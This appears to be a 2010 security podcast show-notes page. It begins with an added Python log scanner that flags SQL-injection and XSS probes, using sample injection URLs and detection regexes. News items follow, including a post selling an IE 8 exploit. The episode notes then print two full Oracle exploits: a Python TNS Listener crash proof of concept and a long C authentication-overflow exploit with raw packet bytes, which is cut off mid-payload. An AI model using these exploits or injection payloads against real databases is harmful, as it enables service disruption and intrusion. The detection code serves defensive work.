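Detection logic for the probe shapes in the Joomla SQL-injection items (JBDiary in Episode 54 above, and com_gameserver, com_gurujibook, JbPublishDownFp and Mochigames in this episode) and the PunBB XSS item, as an added example that is not code from the podcast or from any of the advisories. It decodes request URLs the way the application would and flags them; the access-log lines are constructed, and the list of parameters treated as numeric is an assumption about these components.

```python
"""Flag SQL-injection and XSS probes in web access logs (added example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Injection shapes taken from the example URLs in the advisories above:
# @@version fingerprinting, UNION SELECT extraction of jos_users, concat()
# column stacking, a closing quote followed by a boolean operator, and a
# trailing comment that discards the rest of the query (%23 -> '#', or '--').
SQLI_RULES = [
    (re.compile(r"@@version", re.I), "db version fingerprint"),
    (re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I), "UNION SELECT extraction"),
    (re.compile(r"\bjos_users\b", re.I), "Joomla user table referenced"),
    (re.compile(r"\bconcat\s*\(", re.I), "concat() column stacking"),
    (re.compile(r"'\s*(?:and|or)\b", re.I), "quote break with boolean"),
    (re.compile(r"(?:--|#)\s*$"), "trailing SQL comment"),
]
XSS_RULES = [
    (re.compile(r"<\s*script\b", re.I), "inline script tag"),
    (re.compile(r"\bon[a-z]+\s*=", re.I), "event handler attribute"),
]
# Assumption: these parameters are integer ids/dates in the affected
# components, so any non-numeric value is suspicious on its own.
NUMERIC_PARAMS = {"id", "pid", "bookid", "grp", "cid[]", "Itemid", "newyear", "newmonth"}

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_params(url):
    """Return (name, value) pairs decoded as the application would see them
    ('+' -> space, %27 -> quote, %23 -> '#')."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def inspect_request(url):
    """Return a list of (parameter, rule label) findings for one request URL."""
    findings = []
    for name, value in decode_params(url):
        for rule, label in SQLI_RULES + XSS_RULES:
            if rule.search(value):
                findings.append((name, label))
        if name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", value):
            findings.append((name, "non-numeric value in numeric parameter"))
    return findings


def scan_log(lines):
    """Return {client_ip: [(url, findings), ...]} for every flagged request."""
    flagged = {}
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = match.group(1)
        findings = inspect_request(url)
        if findings:
            ip = line.split(" ", 1)[0]
            flagged.setdefault(ip, []).append((url, findings))
    return flagged


# Constructed access-log lines modelled on the example URLs above (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Jan/2010:10:01:02 -0500] "GET /?newyear=2011%27+and+substring(@@version,1,1)=5%23&newmonth=01 HTTP/1.1" 200 512',
    '10.0.0.5 - - [26/Jan/2010:10:01:09 -0500] "GET /index.php?view=mochigames&id=99999%27+union+select+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%23&option=com_mochigames&Itemid=80 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [26/Jan/2010:10:02:00 -0500] "GET /forum/viewtopic.php?pid=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024',
    '10.0.0.7 - - [26/Jan/2010:10:03:00 -0500] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        for url, findings in hits:
            print(ip, url)
            for name, label in findings:
                print("   ", name, "->", label)
```

The same parameter-type check is the fix on the application side: a parameter that is only ever an integer should be cast or rejected before it reaches the query.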


News Items of Interest:

News item 1: http://news.bbc.co.uk/2/hi/americas/8478005.stm

A Chinese industry ministry spokesman told the state-run Xinhua news agency that claims that Beijing was behind recent cyber attacks were "groundless". US Secretary of State Hillary Clinton this week asked China to investigate claims by Google that it had been targeted by China-based hackers. The US search giant has threatened to withdraw from China. "The accusation that the Chinese government participated in [any] cyber attack, either in an explicit or inexplicit way, is groundless. We [are] firmly opposed to that," the unnamed spokesman of China's ministry of industry and information technology told Xinhua.

News item 2: http://pajamasmedia.com/instapundit/92423/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+instapundit%2Fmain+%28Instapundit%29

“In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts. This feature is what the Chinese hackers exploited to gain access. Google’s system isn’t unique. Democratic governments around the world — in Sweden, Canada and the UK, for example — are rushing to pass laws giving their police new powers of Internet surveillance, in many cases requiring communications system providers to redesign products and services they sell.”

News item 3: http://seclists.org/fulldisclosure/2010/Jan/474

From: Orn Roswell <orn.roswell () gmail com>
Date: Sun, 24 Jan 2010 23:52:27 +0100
Hello,

I am selling IE 8 remote code execution exploit (not patched by the last Microsoft fix). Working under Windows Vista & Windows 7.

Regards,

[ORN ROSWELL]

News item 4: http://www.computerworld.com/s/article/9148138/Researcher_to_reveal_more_Internet_Explorer_problems
Microsoft’s Internet Explorer (IE) could inadvertently allow a hacker to read files on a person’s computer, another problem for the company just days after a serious vulnerability received an emergency patch.

The problem was actually discovered as long as two years ago but has persisted despite two attempts by Microsoft to fix it, said Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies. He is scheduled to give a presentation at the Black Hat conference in Washington, D.C., on Feb. 3.

News item 5: http://news.cnet.com/8301-13772_3-10440819-52.html?part=rss&subj=news&tag=2547-1_3-0-20

Earlier this month, as reported by AVWeb, the U.S. Federal Aviation Administration issued “special conditions” regarding Boeing’s forthcoming 747-8–the next-generation of its iconic 747 line of planes–aimed at making sure that the new plane’s high-tech networking systems are hack proof.

According to the FAA, the 747-8–which should have its first flight any day now, and which is intended to be a much more efficient and powerful version of the 747 than even its most recent models–"will have novel or unusual design features associated with the architecture and connectivity capabilities of the airplane's computer systems and networks, which may allow access to external computer systems and networks."

2010
01.22

Episode 52 – Mood Swing

InfoSec Daily Podcast

 
InfoSec Podcast Episode 52 for January 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Register online at the SANS website or call (301) 654-SANS (7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

  1. Oracle Database is subject to a remote memory-corruption vulnerability in the Listener. The vulnerability can be exploited over the ‘Oracle Net’ protocol, and an attacker does not require privileges to exploit it. This vulnerability affects the following supported versions: 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4 and 11.1.0.7. Proof of concept is available:
    # TNS Listener (Oracle RDBMS) exploit, cause Listener process crash

    # While running on 11.1.0.7.0 win32, the nsglvcrt() Listener function attempts
    # to allocate a huge memory block and copy *something* to it.

    # TID=3052|(1) MSVCR71.dll!malloc (0x4222fc5) (called from 0x438631 (TNSLSNR.EXE!nsglvcrt+0x95))
    # TID=3052|(1) MSVCR71.dll!malloc -> 0x2530020
    # TID=3052|(0) TNSLSNR.EXE!__intel_fast_memcpy (0x2530020, 0, 0x4222fc4) (called from 0x438647 (TNSLSNR.EXE!nsglvcrt+0xab))

    # (addresses are for TNS Listener 11.1.0.7.0 win32 unpatched)
    # If I'm correct, the nsglvcrt() function is involved in new service creation.

    # Successfully crashed:
    # Oracle RDBMS 11.1.0.6.0 win32 with CPUapr2009 applied
    # Oracle RDBMS 11.1.0.7.0 win32 with CPUapr2009 applied
    # Oracle RDBMS 10.2.0.4 win32 with CPUapr2009 applied
    # Oracle RDBMS 10.2.0.2 Linux x86
    # Not crashed:
    # Oracle RDBMS 11.2 Linux x86

    # Vulnerability discovered by Dennis Yurichev <dennis@conus.info>

    # Fixed in CPUjan2010 as CVE-2010-0071 (CVSS 10.0):
    # http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html

    import sys
    import socket

    if len(sys.argv) != 2:
        sys.exit("use: %s <hostname>" % sys.argv[0])

    sockobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    sockobj.connect((sys.argv[1], 1521))

    # TNS CONNECT packet (type 1, 0x68 = 104 bytes); the connect string at
    # offset 0x3A is (CONNECT_DATA=(COMMAND=service_register_NSGR))
    sockobj.send(
        b"\x00\x68\x00\x00\x01\x00\x00\x00"
        b"\x01\x3A\x01\x2C\x00\x00\x20\x00"
        b"\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
        b"\x00\x2E\x00\x3A\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x28\x43\x4F\x4E\x4E\x45"
        b"\x43\x54\x5F\x44\x41\x54\x41\x3D"
        b"\x28\x43\x4F\x4D\x4D\x41\x4E\x44"
        b"\x3D\x73\x65\x72\x76\x69\x63\x65"
        b"\x5F\x72\x65\x67\x69\x73\x74\x65"
        b"\x72\x5F\x4E\x53\x47\x52\x29\x29"
    )

    data = sockobj.recv(102400)

    # TNS DATA packet (type 6, 0x2DE = 734 bytes) carrying the service
    # registration payload that makes nsglvcrt() allocate and copy
    sockobj.send(
        b"\x02\xDE\x00\x00\x06\x00\x00\x00"
        b"\x00\x00\x00\x00\x02\xD4\x20\x08"
        b"\xFF\x03\x01\x00\x12\x34\x34\x34"
        b"\x34\x34\x78\x10\x10\x32\x10\x32"
        b"\x10\x32\x10\x32\x10\x32\x54\x76"
        b"\x00\x78\x10\x32\x54\x76\x44\x00"
        b"\x00\x80\x02\x00\x00\x00\x00\x04"
        b"\x00\x00\x70\xE4\xA5\x09\x90\x00"
        b"\x23\x00\x00\x00\x42\x45\x43\x37"
        b"\x36\x43\x32\x43\x43\x31\x33\x36"
        b"\x2D\x35\x46\x39\x46\x2D\x45\x30"
        b"\x33\x34\x2D\x30\x30\x30\x33\x42"
        b"\x41\x31\x33\x37\x34\x42\x33\x03"
        b"\x00\x65\x00\x01\x00\x01\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x64\x02"
        b"\x00\x80\x05\x00\x00\x00\x00\x04"
        b"\x00\x00\x00\x00\x00\x00\x01\x00"
        b"\x00\x00\x10\x00\x00\x00\x02\x00"
        b"\x00\x00\x84\xC3\xCC\x07\x01\x00"
        b"\x00\x00\x84\x2F\xA6\x09\x00\x00"
        b"\x00\x00\x44\xA5\xA2\x09\x25\x98"
        b"\x18\xE9\x28\x50\x4F\x28\xBB\xAC"
        b"\x15\x56\x8E\x68\x1D\x6D\x05\x00"
        b"\x00\x00\xFC\xA9\x36\x22\x0F\x00"
        b"\x00\x00\x60\x30\xA6\x09\x0A\x00"
        b"\x00\x00\x64\x00\x00\x00\x00\x00"
        b"\x00\x00\xAA\x00\x00\x00\x00\x01"
        b"\x00\x00\x17\x00\x00\x00\x78\xC3"
        b"\xCC\x07\x6F\x72\x63\x6C\x00\x28"
        b"\x48\x4F\x53\x54\x3D\x77\x69\x6E"
        b"\x32\x30\x30\x33\x29\x00\x01\x00"
        b"\x00\x00\x58\x00\x00\x00\x01\x00"
        b"\x00\x00\x50\xC5\x2F\x22\x02\x00"
        b"\x00\x00\x34\xC5\x2F\x22\x00\x00"
        b"\x00\x00\x9C\xC5\xCC\x07\x6F\x72"
        b"\x63\x6C\x5F\x58\x50\x54\x00\x09"
        b"\x00\x00\x00\x50\xC5\x2F\x22\x04"
        b"\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x34"
        b"\xC5\xCC\x07\x6F\x72\x63\x6C\x5F"
        b"\x58\x50\x54\x00\x01\x00\x00\x00"
        b"\x05\x00\x00\x00\x01\x00\x00\x00"
        b"\x84\xC5\x2F\x22\x02\x00\x00\x00"
        b"\x68\xC5\x2F\x22\x00\x00\x00\x00"
        b"\xA4\xA5\xA2\x09\x6F\x72\x63\x6C"
        b"\x00\x05\x00\x00\x00\x84\xC5\x2F"
        b"\x22\x04\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\xFC\xC4\xCC\x07\x6F\x72\x63"
        b"\x6C\x00\x01\x00\x00\x00\x10\x00"
        b"\x00\x00\x02\x00\x00\x00\xBC\xC3"
        b"\xCC\x07\x04\x00\x00\x00\xB0\x2F"
        b"\xA6\x09\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x89\xC0\xB1\xC3\x08\x1D"
        b"\x46\x6D\xB6\xCF\xD1\xDD\x2C\xA7"
        b"\x66\x6D\x0A\x00\x00\x00\x78\x2B"
        b"\xBC\x04\x7F\x00\x00\x00\x64\xA7"
        b"\xA2\x09\x0D\x00\x00\x00\x20\x2C"
        b"\xBC\x04\x11\x00\x00\x00\x95\x00"
        b"\x00\x00\x02\x20\x00\x80\x03\x00"
        b"\x00\x00\x98\xC5\x2F\x22\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x0A\x00"
        b"\x00\x00\xB0\xC3\xCC\x07\x44\x45"
        b"\x44\x49\x43\x41\x54\x45\x44\x00"
        b"\x28\x41\x44\x44\x52\x45\x53\x53"
        b"\x3D\x28\x50\x52\x4F\x54\x4F\x43"
        b"\x4F\x4C\x3D\x42\x45\x51\x29\x28"
        b"\x50\x52\x4F\x47\x52\x41\x4D\x3D"
        b"\x43\x3A\x5C\x61\x70\x70\x5C\x41"
        b"\x64\x6D\x69\x6E\x69\x73\x74\x72"
        b"\x61\x74\x6F\x72\x5C\x70\x72\x6F"
        b"\x64\x75\x63\x74\x5C\x31\x31\x2E"
        b"\x31\x2E\x30\x5C\x64\x62\x5F\x31"
        b"\x5C\x62\x69\x6E\x5C\x6F\x72\x61"
        b"\x63\x6C\x65\x2E\x65\x78\x65\x29"
        b"\x28\x41\x52\x47\x56\x30\x3D\x6F"
        b"\x72\x61\x63\x6C\x65\x6F\x72\x63"
        b"\x6C\x29\x28\x41\x52\x47\x53\x3D"
        b"\x27\x28\x4C\x4F\x43\x41\x4C\x3D"
        b"\x4E\x4F\x29\x27\x29\x29\x00\x4C"
        b"\x4F\x43\x41\x4C\x20\x53\x45\x52"
        b"\x56\x45\x52\x00\x68\xC5\x2F\x22"
        b"\x34\xC5\x2F\x22\x00\x00\x00\x00"
        b"\x05\x00\x00\x00\x84\xC5\x2F\x22"
        b"\x04\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\xFC\xC4\xCC\x07\x6F\x72\x63\x6C"
        b"\x00\x09\x00\x00\x00\x50\xC5\x2F"
        b"\x22\x04\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x34\xC5\xCC\x07\x6F\x72\x63"
        b"\x6C\x5F\x58\x50\x54\x00"
    )

    sockobj.close()

  2. Oracle Network Authentication is subject to a remote buffer-overflow vulnerability. The vulnerability can be exploited over the ‘Oracle Net’ protocol, and an attacker doesn’t need specific privileges to exploit it. Oracle Database 10g versions 10.1.0.5 and 10.2.0.4 are affected. Exploit is available:
    #include <winsock2.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <windows.h>
    #include <assert.h>

    #include <string>

    // send a buffer and report failed or short sends
    void s_send (SOCKET s, const char *msg, DWORD size)
    {
        int sent;

        printf ("s_send: begin: %d bytes\n", size);

        sent=send (s, msg, size, 0);

        if (sent==SOCKET_ERROR)
        {
            printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
        }
        else if (sent!=(int)size)
            printf ("sent only %d bytes\n", sent);

        printf ("s_send: end\n");
    }

    // wait up to 100 ms for a reply and read it (the reply is not inspected)
    void s_recv (SOCKET s)
    {
        char buf[20000];
        int r;

        struct timeval t;
        fd_set fd;

        t.tv_sec=0;
        t.tv_usec=100000; // 100 ms

        printf ("s_recv: begin\n");

        FD_ZERO(&fd);
        FD_SET(s, &fd);

        if (select (0, &fd, 0, 0, &t))
        // if (select (0, &fd, 0, 0, NULL))
        {
            r=recv (s, buf, 20000, 0);
            if (r!=0 && r!=-1)
            {
                printf ("got %d bytes\n", r);
            }
            else
            {
                printf ("connection lost, r=%d\n", r);
            }
        }
        else
        {
            printf ("select() returns zero\n");
        }
    }

    // TNS CONNECT packet header template (s_send_TNS_command below carries its own copy)
    unsigned char NSPTCN[]=
    {
        0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00,
        0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
        0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00,
        //^^ ^^ cmd len
        0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00
    };

    #define NSPTCN_HEADER_LEN 58

    // TNS DATA packet header template; bytes 0-1 receive the packet length
    unsigned char NSPTDA[]=
    {
        0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
        // ^^ ^^ packet len
        0x00, 0x00
    };

    #define NSPTDA_HEADER_LEN 10

    void s_send_NSPTDA (SOCKET s, const char *msg, int size)
    {
        char * buf;
        int sz=size + NSPTDA_HEADER_LEN;

        buf=(char*)malloc (sz);
        assert (buf!=NULL);

        NSPTDA[0]=( sz ) >> 8;
        NSPTDA[1]=( sz ) & 0xFF;

        memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
        memcpy (buf + NSPTDA_HEADER_LEN, msg, size);

        printf ("s_send_NSPTDA: sending %d bytes...\n", sz);

        s_send (s, buf, sz);

        free (buf);
    }

    // wrap a connect string in a TNS CONNECT packet and send it
    void s_send_TNS_command (SOCKET s, const char *cmd)
    {
        unsigned char * pkt;
        int cmd_len=strlen (cmd);

        printf ("sending [%s]\n", cmd);
        printf ("len: %d\n", cmd_len);

        if (cmd_len<231)
        {
            int str_len=strlen(cmd);
            int pkt_len=str_len+58;

            pkt=(unsigned char*)malloc (str_len+58);
            assert (pkt!=NULL);

            memcpy (pkt,
                "\x00\x00\x00\x00\x01\x00\x00\x00"
                // plenH, plenL
                "\x01\x3A\x01\x2C\x00\x41\x20\x00"
                "\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
                "\x00\x00\x00\x3A\x00\x00\x02\x00"
                // cmdlenH cmdlenL
                "\x61\x61\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00", 58);

            memcpy (pkt+58, cmd, str_len);

            pkt[1]=pkt_len&0xFF;
            pkt[0]=(pkt_len>>8)&0xFF;

            pkt[25]=str_len&0xFF;
            pkt[24]=(str_len>>8)&0xFF;

            s_send (s, (char*)pkt, pkt_len);

            free (pkt);
        }
        else
        {
            // something should be modified here in NSPTCN
            assert (0);
        }
    }

    bool try_host (char * h)
    {
        struct hostent *hp;
        WSADATA wsaData;
        struct sockaddr_in sin;
        int r;
        struct timeval t;
        fd_set fd;
        SOCKET s;
        u_long on=1;
        char pkt1318[1318];

        WSAStartup(MAKEWORD(1, 1), &wsaData);

        hp=gethostbyname (h);
        assert (hp!=NULL);

        s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);

        assert (s!=INVALID_SOCKET);

        // non-blocking socket, so that connect() can be bounded by the select() below
        r=ioctlsocket(s, FIONBIO, &on);
        assert (r!=SOCKET_ERROR);

        sin.sin_family=AF_INET;
        sin.sin_port=htons(1521);
        memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);

        r=connect(s, (struct sockaddr *)&sin, sizeof(sin));

        t.tv_sec=3;
        t.tv_usec=0;

        FD_ZERO(&fd);
        FD_SET(s, &fd);

        if (select (0, 0, &fd, 0, &t))
        {
            printf ("connected to %s\n", h);

            s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");

            // waiting for NSPTRS (resend)

            s_recv(s);

            s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");

            // waiting for NSPTAC (accept)

            s_recv(s);

            // send NA packet

            s_send (s,
                "\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92"
                "\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00"
                "\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71"
                "\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00"
                "\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00"
                "\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00"
                "\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00"
                "\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A"
                "\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00"
                "\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
                ,156);

            s_recv (s);

            // send TTIPRO

            s_send (s,
                "\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02"
                "\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38"
                "\x2E\x31\x2E\x30\x00"
                , 37);

            s_recv (s);

            // send TTIDTY

            s_send (s,
                "\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2"
                "\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01"
                "\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01"
                "\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00"
                "\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
                , 75);

            s_recv (s);

            // call OSESSKEY

            s_send (s,
                "\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF"
                "\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00"
                "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D"
                "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41"
                "\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F"
                "\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D"
                "\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65"
                "\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F"
                "\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B"
                "\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08"
                "\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00"
                "\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00"
                "\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06"
                "\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00"
                , 218);

            // call OAUTH

            memcpy (pkt1318,
                "\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF"
                "\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00"
                "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C"
                "\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59"
                "\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41"
                "\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36"
                "\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35"
                "\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43"
                "\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55"
                "\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40"
                "\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46"
                "\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38"
                "\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37"
                "\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34"
                "\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54"
                "\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D"
                "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45"
                "\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00"
                "\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C"
                "\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00"
                "\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F"
                "\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78"
                "\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D"
                "\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47"
                "\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00"
                "\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09"
                "\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00"
                "\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64"
                "\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
                "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41"
                "\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00"
                "\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49"
                "\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00"
                "\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49"
                "\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52"
                "\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61"
                "\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00"
                "\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F"
                "\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35"
                "\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
                "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42"
                "\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00"
                "\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04"
                "\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54"
                "\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9"
                "\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49"
                "\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55"
                "\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20"
